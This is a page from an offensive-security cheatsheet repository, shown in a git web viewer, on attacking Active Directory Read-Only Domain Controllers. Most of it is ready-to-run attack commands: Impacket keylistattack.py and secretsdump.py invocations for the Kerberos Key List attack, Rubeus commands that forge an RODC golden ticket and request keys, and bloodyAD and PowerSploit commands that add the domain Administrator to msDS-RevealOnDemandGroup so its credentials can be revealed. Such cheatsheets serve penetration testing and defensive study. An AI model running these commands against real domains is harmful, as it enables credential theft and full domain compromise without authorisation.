daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adds-rodc.md (3779B)


      1 ---
      2 title: "Active Directory - Read Only Domain Controller"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adds-rodc.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adds-rodc.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Read Only Domain Controller
     12 
     13 RODCs are an alternative for Domain Controllers in less secure physical locations
     14 
     15 - Contains a filtered copy of AD (LAPS and Bitlocker keys are excluded)
     16 - Any user or group specified in the **managedBy** attribute of an RODC has local admin access to the RODC server
     17 
     18 ## RODC Golden Ticket
     19 
     20 - You can forge an RODC golden ticket and present it to a writable Domain Controller only for principals listed in the RODC’s **msDS-RevealOnDemandGroup** attribute and not in the RODC’s **msDS-NeverRevealGroup** attribute
     21 
     22 ## RODC Key List Attack
     23 
     24 **Requirements**:
     25 
     26 - [Impacket PR #1210 - The Kerberos Key List Attack](https://github.com/SecureAuthCorp/impacket/pull/1210)
     27 - **krbtgt** credentials of the RODC (-rodcKey)
     28 - **ID of the krbtgt** account of the RODC (-rodcNo)
     29 
     30 **Exploit**:
     31 
     32 - using Impacket
     33 
     34   ```ps1
     35   # keylistattack.py using SAMR user enumeration without filtering (-full flag)
     36   keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
     37 
     38   # keylistattack.py defining a target username (-t flag)
     39   keylistattack.py -kdc server.domain.local -t user -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX LIST
     40 
     41   # secretsdump.py using the Kerberos Key List Attack option (-use-keylist)
     42   secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
     43   ```
     44 
     45 - Using Rubeus
     46 
     47   ```ps1
     48   Rubeus.exe golden /rodcNumber:25078 /aes256:eacd894dd0d934e84de35860ce06a4fac591ca63c228ddc1c7a0ebbfa64c7545 /user:admin /id:1136 /domain:lab.local /sid:S-1-5-21-1437000690-1664695696-1586295871
     49   Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/lab.local /dc:dc1.lab.local /ticket:doIFgzCC[...]wIBBxhYnM=
     50   ```
     51 
     52 ## RODC Computer Object
     53 
     54 When you have one the following permissions to the RODC computer object: **GenericWrite**, **GenericAll**, **WriteDacl**, **Owns**, **WriteOwner**, **WriteProperty**.
     55 
     56 - Add a domain admin account to the RODC's **msDS-RevealOnDemandGroup** attribute
     57     - Windows/Linux:
     58 
     59     ```ps1
     60     # Get original msDS-RevealOnDemandGroup values 
     61     bloodyAD --host 10.10.10.10 -d domain.local -u username -p pass123 get object 'RODC$' --attr msDS-RevealOnDemandGroup
     62     distinguishedName: CN=RODC,CN=Computers,DC=domain,DC=local
     63     msDS-RevealOnDemandGroup: CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local
     64     # Add the previous value plus the admin account
     65     bloodyAD --host 10.10.10.10 -d example.lab -u username -p pass123 set object 'RODC$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'
     66     ```
     67 
     68     - Windows only:
     69 
     70   ```ps1
     71   PowerSploit> Set-DomainObject -Identity RODC$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}
     72   ```
     73 
     74 ## References
     75 
     76 - [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592)
     77 - [At the Edge of Tier Zero: The Curious Case of the RODC - Elad Shamir](https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06)
     78 - [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)